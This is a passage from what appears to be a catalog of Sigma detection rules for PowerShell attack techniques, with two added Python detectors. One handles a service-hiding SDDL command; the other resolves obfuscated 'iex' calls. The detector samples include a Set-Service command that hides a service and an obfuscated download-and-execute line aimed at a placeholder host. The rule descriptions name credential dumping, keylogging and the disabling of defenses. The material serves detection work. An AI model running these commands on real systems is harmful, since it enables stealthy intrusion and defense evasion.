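HIDING_SDDL = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
               "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
NORMAL_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
SCRIPT_BLOCK = "Set-Service -Name 'UpdateSvc' -SecurityDescriptorSddl '" + HIDING_SDDL + "'"

if __name__ == "__main__":
    sddl = sddl_from_scriptblock(SCRIPT_BLOCK)
    for f in find_hiding_aces(sddl):
        print(f["trustee"], "denied", ", ".join(SERVICE_RIGHTS[x] for x in f["denied"]))
```

When triaging a hit, compare the logged descriptor against the service's previous DACL (sc.exe sdshow) rather than against a fixed string: the rule fires on the DCLCWPDTSD substring, but it is the deny ACE on a broad trustee that tells you the intent.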

Suspicious PowerShell Invocations - Generic

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Generic"

Suspicious PowerShell Invocations - Generic has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9673. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml

SyncAppvPublishingServer Execution to Bypass Powershell Restriction

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Execution to Bypass Powershell Restriction"

SyncAppvPublishingServer Execution to Bypass Powershell Restriction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9674. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml

Automated Collection Command PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

The tag is: misp-galaxy:sigma-rules="Automated Collection Command PowerShell"

Automated Collection Command PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 9675. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml

Windows Firewall Profile Disabled

Detects when a user disables a Windows Firewall profile (for example via Set-NetFirewallProfile) to evade defenses.

The tag is: misp-galaxy:sigma-rules="Windows Firewall Profile Disabled"

Windows Firewall Profile Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9676. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html

https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps

http://powershellhelp.space/commands/set-netfirewallrule-psv5.php

http://woshub.com/manage-windows-firewall-powershell/

https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml

Manipulation of User Computer or Group Security Principals Across AD

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain.

The tag is: misp-galaxy:sigma-rules="Manipulation of User Computer or Group Security Principals Across AD"

Manipulation of User Computer or Group Security Principals Across AD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

Table 9677. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml

Potential Data Exfiltration Via Audio File

Detects potential exfiltration attempt via audio file using PowerShell

The tag is: misp-galaxy:sigma-rules="Potential Data Exfiltration Via Audio File"

Table 9678. Table References

Links

https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml

Disable Powershell Command History

Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module.

The tag is: misp-galaxy:sigma-rules="Disable Powershell Command History"

Disable Powershell Command History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9679. Table References

Links

https://twitter.com/DissectMalware/status/1062879286749773824

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml

Powershell Keylogging

Adversaries may log user keystrokes to intercept credentials as the user types them.

The tag is: misp-galaxy:sigma-rules="Powershell Keylogging"

Powershell Keylogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 9680. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml

Access to Browser Login Data

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

The tag is: misp-galaxy:sigma-rules="Access to Browser Login Data"

Access to Browser Login Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 9681. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml

Import PowerShell Modules From Suspicious Directories

Detects powershell scripts that import modules from suspicious directories

The tag is: misp-galaxy:sigma-rules="Import PowerShell Modules From Suspicious Directories"

Import PowerShell Modules From Suspicious Directories has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9683. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml

Powershell Sensitive File Discovery

Detects adversaries enumerating sensitive files.

The tag is: misp-galaxy:sigma-rules="Powershell Sensitive File Discovery"

Powershell Sensitive File Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 9684. Table References

Links

https://twitter.com/malmoeb/status/1570814999370801158

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml

PowerShell Script With File Hostname Resolving Capabilities

Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.

The tag is: misp-galaxy:sigma-rules="PowerShell Script With File Hostname Resolving Capabilities"

PowerShell Script With File Hostname Resolving Capabilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 9685. Table References

Links

https://www.fortypoundhead.com/showcontent.asp?artid=24022

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml

Dump Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

The tag is: misp-galaxy:sigma-rules="Dump Credentials from Windows Credential Manager With PowerShell"

Dump Credentials from Windows Credential Manager With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 9686. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml

Suspicious SSL Connection

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

The tag is: misp-galaxy:sigma-rules="Suspicious SSL Connection"

Suspicious SSL Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"

Table 9687. Table References

Links

https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml

Potential In-Memory Execution Using Reflection.Assembly

Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory

The tag is: misp-galaxy:sigma-rules="Potential In-Memory Execution Using Reflection.Assembly"

Potential In-Memory Execution Using Reflection.Assembly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"

Table 9688. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml

HackTool - WinPwn Execution - ScriptBlock

Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.

The tag is: misp-galaxy:sigma-rules="HackTool - WinPwn Execution - ScriptBlock"

HackTool - WinPwn Execution - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 9689. Table References

Links

https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841

https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md

https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/

https://github.com/S3cur3Th1sSh1t/WinPwn

redcanaryco/atomic-red-team (GitHub repository)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml

Suspicious Get-ADReplAccount

The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

The tag is: misp-galaxy:sigma-rules="Suspicious Get-ADReplAccount"

Suspicious Get-ADReplAccount has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9690. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount

https://www.powershellgallery.com/packages/DSInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml

Disable of ETW Trace - Powershell

Detects usage of powershell cmdlets to disable or remove ETW trace sessions

The tag is: misp-galaxy:sigma-rules="Disable of ETW Trace - Powershell"

Disable of ETW Trace - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 9691. Table References

Links

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml

Change PowerShell Policies to an Insecure Level - PowerShell

Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

The tag is: misp-galaxy:sigma-rules="Change PowerShell Policies to an Insecure Level - PowerShell"

Change PowerShell Policies to an Insecure Level - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9692. Table References

Links

https://adsecurity.org/?p=2604

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml

DirectorySearcher Powershell Exploitation

Detects use of the .NET DirectorySearcher class from PowerShell to enumerate Active Directory for computers joined to the domain.

The tag is: misp-galaxy:sigma-rules="DirectorySearcher Powershell Exploitation"

DirectorySearcher Powershell Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 9693. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml

Suspicious Unblock-File

Detects use of Unblock-File to remove the Zone.Identifier alternate data stream, which marks a file as downloaded from the internet (Mark-of-the-Web).

The tag is: misp-galaxy:sigma-rules="Suspicious Unblock-File"

Suspicious Unblock-File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9694. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml

Powershell Suspicious Win32_PnPEntity

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

The tag is: misp-galaxy:sigma-rules="Powershell Suspicious Win32_PnPEntity"

Powershell Suspicious Win32_PnPEntity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 9695. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml

Enumerate Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

The tag is: misp-galaxy:sigma-rules="Enumerate Credentials from Windows Credential Manager With PowerShell"

Enumerate Credentials from Windows Credential Manager With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 9696. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml

Invoke-Obfuscation Via Use Rundll32 - PowerShell

Detects obfuscated PowerShell that uses Rundll32 in scripts (Invoke-Obfuscation style).

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - PowerShell"

Invoke-Obfuscation Via Use Rundll32 - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9697. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging

Detects attempts to remove Windows Defender configuration using the Remove-MpPreference cmdlet.

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging"

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9698. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml

Powershell Execute Batch Script

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

The tag is: misp-galaxy:sigma-rules="Powershell Execute Batch Script"

Powershell Execute Batch Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9699. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework (the generating code block is the Out-ObfuscatedStringCommand.ps1 range referenced below).

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell"

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9700. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml
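Added example for the obfuscated IEX entry above; it is not code from the page, from Invoke-Obfuscation or from the Sigma rule. The generator spells "iex" by indexing into strings whose value is stable on a stock host (for example $ShellId[1]+$ShellId[13]+'x', or $env:ComSpec[4,15,25]-Join''), which is why the rule can match on fixed index patterns. The Python below resolves such call sites against assumed host values so an analyst can confirm what a logged expression actually invokes instead of trusting the pattern match. The values in HOST are assumptions about a default Windows install, the regexes cover only the index-and-concatenate forms, and the SAMPLES list is constructed.

```python
import re


def _key(s):
    return re.sub(r"\s+", "", s).lower()


# Assumed values on a stock Windows host for the strings the index tricks read.
# They are assumptions for this example, not values taken from the page.
HOST = {_key(k): v for k, v in {
    "$ShellId": "Microsoft.PowerShell",
    "$PSHome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "$env:ComSpec": r"C:\WINDOWS\system32\cmd.exe",
    "$VerbosePreference": "SilentlyContinue",
    "(Get-Variable '*mdr*').Name": "MaximumDriveCount",
}.items()}

# One token of an obfuscated expression: either <source>[i,j,...] (optionally via .ToString())
# or a quoted literal such as the trailing 'x' or the '' of -Join''.
TOKEN_RE = re.compile(
    r"(?P<src>\$env:ComSpec|\$ShellId|\$PSHome|\$VerbosePreference|\(Get-Variable\s+'\*mdr\*'\)\.Name)"
    r"(?:\.ToString\(\))?\[(?P<idx>\d+(?:\s*,\s*\d+)*)\]"
    r"|(?P<q>['\"])(?P<lit>[^'\"]*)(?P=q)",
    re.I,
)
# A call site: .( expr ) or &( expr ), allowing one level of nested parentheses inside expr.
CALL_RE = re.compile(r"[.&]\s*\((?P<expr>(?:[^()]|\([^()]*\))*)\)")


def resolve(expr):
    """Evaluate the index-and-concatenate expression to the string it builds."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group("src"):
            value = HOST[_key(m.group("src"))]
            for i in m.group("idx").split(","):
                i = int(i)
                if i < len(value):
                    out.append(value[i])
        else:
            out.append(m.group("lit"))
    return "".join(out)


def find_obfuscated_iex(script_block_text):
    """Return (expression, resolved) pairs for call sites whose expression resolves to iex."""
    hits = []
    for m in CALL_RE.finditer(script_block_text):
        resolved = resolve(m.group("expr"))
        if resolved.lower() == "iex":
            hits.append((m.group("expr").strip(), resolved))
    return hits


# Constructed script block texts; the download URL is a placeholder.
SAMPLES = [
    ".($ShellId[1]+$ShellId[13]+'x')(New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    "&($env:ComSpec[4,15,25]-Join'')('Get-Process')",
    ".( $VerbosePreference.ToString()[1,3]+'x')",
    "&((Get-Variable '*mdr*').Name[3,11,2]-Join'')",
    ".($PSHome[21]+$PSHome[34]+'x')",
    "Get-ChildItem ($env:ProgramFiles) | Select-Object Name",   # benign, no call site
    "&('Get-Process')",                                        # call site, but not iex
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(find_obfuscated_iex(s) or "clean", "<-", s)
```

The resolver is deliberately narrow: anything it cannot evaluate is left for the rule's literal patterns, and a resolved "iex" on a .( ) or &( ) call site is a stronger signal than any one of those patterns on its own.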

Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript

Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages.

The tag is: misp-galaxy:sigma-rules="Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript"

Table 9701. Table References

Links

https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package

https://twitter.com/WindowsDocs/status/1620078135080325122

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml

Modify Group Policy Settings - ScriptBlockLogging

Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.

The tag is: misp-galaxy:sigma-rules="Modify Group Policy Settings - ScriptBlockLogging"

Modify Group Policy Settings - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

Table 9702. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml

Powershell Store File In Alternate Data Stream

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.

The tag is: misp-galaxy:sigma-rules="Powershell Store File In Alternate Data Stream"

Powershell Store File In Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9703. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml

Windows Screen Capture with CopyFromScreen

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations

The tag is: misp-galaxy:sigma-rules="Windows Screen Capture with CopyFromScreen"

Windows Screen Capture with CopyFromScreen has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 9704. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml

Suspicious PowerShell Download - Powershell Script

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download - Powershell Script"

Suspicious PowerShell Download - Powershell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9705. Table References

Links

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml

PowerShell Credential Prompt

Detects PowerShell calling a credential prompt

The tag is: misp-galaxy:sigma-rules="PowerShell Credential Prompt"

PowerShell Credential Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9706. Table References

Links

https://t.co/ezOTGy1a1G

https://twitter.com/JohnLaTwC/status/850381440629981184

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml

Execute Invoke-command on Remote Host

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Execute Invoke-command on Remote Host"

Execute Invoke-command on Remote Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9707. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml

Powershell Add Name Resolution Policy Table Rule

Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for a specified namespace. Such a rule bypasses the default DNS server and sends queries for that namespace to the specified server instead.

The tag is: misp-galaxy:sigma-rules="Powershell Add Name Resolution Policy Table Rule"

Powershell Add Name Resolution Policy Table Rule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 9708. Table References

Links

https://twitter.com/NathanMcNulty/status/1569497348841287681

https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml
